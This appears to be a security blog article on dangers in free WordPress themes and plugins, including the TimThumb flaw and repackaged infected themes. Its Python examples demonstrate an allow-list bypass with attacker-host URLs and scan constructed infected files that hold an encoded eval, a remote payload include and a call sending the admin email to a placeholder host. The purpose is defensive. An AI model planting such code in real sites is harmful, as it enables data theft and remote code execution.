6 Hack Warnings You Should Know About Free WordPress Themes and Plugins

Although part of WordPress's appeal is how easily it accommodates third-party themes and plugins, those same extension points are a source of trouble as well as productivity. One widespread and easily distributed way of hacking blogs uses WordPress themes that were built to be exploited, and even some legitimate themes have shipped with vulnerabilities that are exposed when they are installed without any hardening. You are most likely to run into malicious themes while searching for no-cost or otherwise "free" WordPress themes, but exploitable themes reach sites through many vectors, so take the time to research a theme's history thoroughly before adding it to your site.

1. The TimThumb Problem: When Resized Pictures Lead to Bad Code

TimThumb, AKA timthumb.php, is a legitimate component bundled with many WordPress themes to resize images for display. Unfortunately, since August 2011 TimThumb has been known to carry a serious vulnerability that lets attackers write PHP code onto the affected website and then execute it. The flaw lies in how it fetched remote images: it kept a short list of trusted image hosts, but checked a requested URL against that list by simple substring matching, so a URL on an attacker's domain that merely contained a trusted host name passed the check, and the fetched file was written into the web-accessible cache directory, from where it could be requested and run. Such attacks have been responsible for browser redirects, drive-by downloads and other browser-based security issues for a site's visitors.

This component, while not a theme in itself, is bundled with many themes, and gained notoriety as the means by which attackers compromised the site of TimThumb's own developer. Because security researchers have judged TimThumb 'inherently insecure' on account of its file-writing design, our advice is to remove timthumb.php from any theme you use on your WordPress site. If you insist on keeping it, there are updated versions and modifications that reduce, though do not eliminate, its security flaws; at the very least, confirm that no copy of timthumb.php older than the August 2011 fix is still present in any of your themes, active or not.
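The check that went wrong is easy to state but worth seeing side by side with a correct one. The following Python is an added example written for this page, not TimThumb's own code (which is PHP): it restates the substring-style allow-list test that the vulnerable versions effectively performed, the parsed-host test that should have been used, and the two cache-writing rules that would have blunted the attack even with a bad allow list. The host names in ALLOWED_HOSTS and the URLs are assumed for illustration.

```python
"""Allow-list bypass of the kind TimThumb suffered: substring vs. parsed-host check."""
import hashlib
from typing import Optional
from urllib.parse import urlsplit

# Hosts the resizer is willing to fetch images from. These names are assumed for
# this example; the real component shipped a similar list of public image hosts.
ALLOWED_HOSTS = ("flickr.com", "picasa.com", "blogger.com", "wordpress.com")

# Magic bytes of the image formats we are prepared to cache.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def is_allowed_vulnerable(src: str) -> bool:
    """The broken check, restated: the URL merely has to *contain* a trusted name.

    http://blogger.com.evil.example/shell.php passes, because 'blogger.com' is in it.
    """
    src = src.lower()
    return any(site in src for site in ALLOWED_HOSTS)


def is_allowed_fixed(src: str) -> bool:
    """The hardened check: parse the URL and compare the actual host name."""
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower()  # drops user@, port, path and query
    return any(host == site or host.endswith("." + site) for site in ALLOWED_HOSTS)


def cache_filename(src: str, body: bytes) -> Optional[str]:
    """Decide whether and how a fetched body may be written to the web-accessible cache.

    Refuse anything whose bytes do not start like an image, and never take the
    extension from the URL: the extension is chosen from the detected format, so a
    fetched .php can never land on disk under a name the web server would execute.
    (The magic-byte test alone is not sufficient; the fixed extension is the part
    that matters.)
    """
    ext = next((e for magic, e in IMAGE_MAGIC.items() if body.startswith(magic)), None)
    if ext is None:
        return None
    return "external_" + hashlib.sha256(src.encode()).hexdigest() + "." + ext


if __name__ == "__main__":
    for url in ("http://img.blogger.com/a.jpg",
                "http://blogger.com.evil.example/shell.php",
                "http://blogger.com@evil.example/shell.php",
                "http://evil.example/s.php?ref=flickr.com"):
        print(f"{url:45} substring={is_allowed_vulnerable(url)!s:5} parsed={is_allowed_fixed(url)}")
```

Running the block prints the four URLs: only the first is accepted by both checks; the other three pass the substring test and fail the parsed-host test.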

2. When a Good Theme Goes Bad

There have also been notable cases of otherwise safe WordPress themes being infected by malware that copies itself from one theme into any other it can reach, such as every theme under the same hosting account or website (they typically share one writable wp-content directory, which is what lets the infection spread). Many of these theme infections carry a limited payload and cannot deliver serious attacks on their own, but they still compromise the theme and silently spread to related themes without showing symptoms. An infected theme should be cleaned either with appropriate anti-malware software or, if your scanners do not recognise the infection, by manually removing the injected code; because the infection spreads, check every theme on the account, not only the one that showed symptoms.

3. From Theme Theft to Malicious Software

As a twist on the virus-laden theme attack above, we have also seen deliberately infected themes distributed alongside other kinds of hostile software. In most cases these are reputable themes copied from their original source (never let it be said that malware distributors aren't lazy!), modified, and then uploaded to general software or WordPress theme download sites such as top-themes.com. One example from 2010 is Chip Bennett's 'Oenology' theme, which was altered without his consent and then uploaded to a separate site. Themes distributed this way can serve as the installation route for many different types of PC threats: attackers use the compromised theme to push threats such as rogue anti-spyware programs onto visitors. Rogue anti-spyware programs like Windows PC Aid and Live Security Platinum are designed to scare gullible users into buying their bogus 'licensed' version.

Whenever possible, download a theme from its original location, such as the developer's website, and avoid downloading themes from sites with suspicious histories. Many free-theme sites do not deliberately distribute PC threats but can still inadvertently host malicious themes that criminals have altered and uploaded. If you do obtain a copy elsewhere, compare it file by file with the developer's original before installing it; any added or changed file is a reason to discard the download.

4. Bad Plugins with Fake Traffic for Minimal Effort

One common scam is a WordPress plugin (or theme) that promises great search-engine rankings and other traffic benefits as soon as you enable it on your site. Add-ons that make such claims, like BlogPress SEO, rely on link-spam and other search-engine-optimisation tricks that legitimate search engines such as Google explicitly penalise. Using one not only fails to help your website's traffic (the search-engine companies constantly hunt for these schemes and set them to be ignored in results), but it can get your entire site removed from Google, Bing or Yahoo search results. With that kind of exile from the web as the penalty, we strongly encourage you to use safe, industry-approved methods of building your blog's traffic.

5. The Other Attacks That Malicious Themes Can Slip In to Target You Directly

Although the primary victims of a bad WordPress theme are your visitors and your own website, malicious themes have also been known to carry attacks aimed at other targets. For instance, the BlogPress SEO add-on mentioned above was caught transmitting the e-mail addresses of the site owners who installed it to its author, without their permission or any notification of the activity. Harvested addresses like these are one of many easy ways for online criminals to build target lists for spam and other attacks.
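Sections 2 to 5 describe four things that can be checked for mechanically: an encoded payload appended to an otherwise legitimate theme file, a theme that no longer matches the developer's original copy, search-engine spam links hidden from visitors, and code that reads the site's admin address and sends it off-site. The following Python scanner is an added example written for this page, not code from any project or vendor it mentions. The regexes are my own indicator patterns, the "pristine" and "infected" theme files are constructed inline for illustration, and a hit means "open this file and read it", not proof of infection.

```python
"""Indicator scan for a WordPress theme: obfuscated code, hidden links, exfiltration,
and drift from a reference copy. Added example; patterns and samples are constructed."""
import hashlib
import re
from pathlib import Path
from typing import Dict, List, Optional

# One regex per indicator class. Order is preserved in the findings list.
RULES = {
    # Section 2/3: encoded payloads appended to legitimate files
    "obfuscated-eval": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # Section 4: spam links inside an element hidden from human visitors
    "hidden-link": re.compile(r"display\s*:\s*none.{0,400}?<a\s[^>]*href", re.I | re.S),
    # Code pulled from a remote URL at runtime, a common way infected themes fetch payloads
    "remote-include": re.compile(
        r"(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I),
}
# Section 5: reading the admin address AND making an outbound call in the same file.
# Either half alone is normal theme code; only the pair is flagged.
ADMIN_EMAIL = re.compile(r"admin_email", re.I)
OUTBOUND = re.compile(
    r"wp_remote_(?:post|get)\s*\(|curl_exec\s*\(|\bmail\s*\(|"
    r"file_get_contents\s*\(\s*['\"]https?://", re.I)


def sha256(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def load_theme_dir(root: str) -> Dict[str, str]:
    """Read a real theme directory into {relative_path: contents} (for live use)."""
    base = Path(root)
    return {
        str(p.relative_to(base)): p.read_text(errors="replace")
        for p in base.rglob("*")
        if p.is_file() and p.suffix in {".php", ".js", ".html", ".css"}
    }


def scan_theme(files: Dict[str, str],
               reference: Optional[Dict[str, str]] = None) -> Dict[str, List[str]]:
    """Return {path: [indicator, ...]} for every file that trips at least one rule.

    files:     {relative_path: contents} of the installed theme.
    reference: same mapping for a pristine copy from the developer's site
               (section 3); if given, modified and added files are reported too.
    """
    findings: Dict[str, List[str]] = {}
    for path, text in files.items():
        hits = [name for name, rx in RULES.items() if rx.search(text)]
        if ADMIN_EMAIL.search(text) and OUTBOUND.search(text):
            hits.append("admin-email-exfil")
        if reference is not None:
            if path not in reference:
                hits.append("file-not-in-reference")
            elif sha256(reference[path]) != sha256(text):
                hits.append("modified-vs-reference")
        if hits:
            findings[path] = hits
    return findings


# Constructed sample: the developer's copy, and the same theme after tampering.
PRISTINE = {
    "functions.php": "<?php\nadd_theme_support('post-thumbnails');\n",
    "footer.php": "<footer>&copy; Example</footer>\n",
    "sidebar.php": "<?php dynamic_sidebar('primary'); ?>\n",
}
INFECTED = {
    # Section 2/3: legitimate file with an encoded payload appended (constructed string)
    "functions.php": PRISTINE["functions.php"]
    + "eval(base64_decode('ZWNobyAnb3duZWQnOw=='));\n",
    # Section 4: hidden search-engine spam links
    "footer.php": PRISTINE["footer.php"]
    + '<div style="display:none"><a href="http://example.invalid/pills">cheap pills</a></div>\n',
    # Section 5: phones home with the site owner's address
    "sidebar.php": PRISTINE["sidebar.php"]
    + "<?php wp_remote_post('http://example.invalid/collect',"
      " array('body' => array('e' => get_option('admin_email')))); ?>\n",
    # Dropped file that is not part of the original theme at all
    "wp-cache.php": "<?php @include('http://example.invalid/payload.txt'); ?>\n",
}

if __name__ == "__main__":
    for path, hits in scan_theme(INFECTED, PRISTINE).items():
        print(f"{path}: {', '.join(hits)}")
```

Against a live install, pass `load_theme_dir("wp-content/themes/<theme>")` as `files` and the same call on an unpacked copy downloaded from the developer as `reference`; the reference comparison is what catches section 3's repackaged themes, whose injected code is often encoded well enough to evade the regex rules.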

6. Why Updating Your Themes Isn’t Something to Put Off

No one likes to update software constantly, but outdated WordPress themes, free ones in particular, are at noticeably greater risk of compromise than current ones, because the flaws in old versions are public and are scanned for automatically. Security companies have observed such theme vulnerabilities being used to launch Blackhole Exploit Kit (BEK) attacks against the compromised sites' visitors. BEK attacks are configurable to exploit a variety of vulnerabilities and to install a large assortment of malicious software, including spyware, banking trojans and worms like WORM_CRIDEX.IC.